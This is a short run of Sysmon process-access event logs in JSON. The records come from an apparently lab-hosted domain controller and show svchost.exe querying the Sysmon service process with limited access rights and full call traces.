{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1578,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1579,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1580,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1581,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1582,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1583,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1584,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1585,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
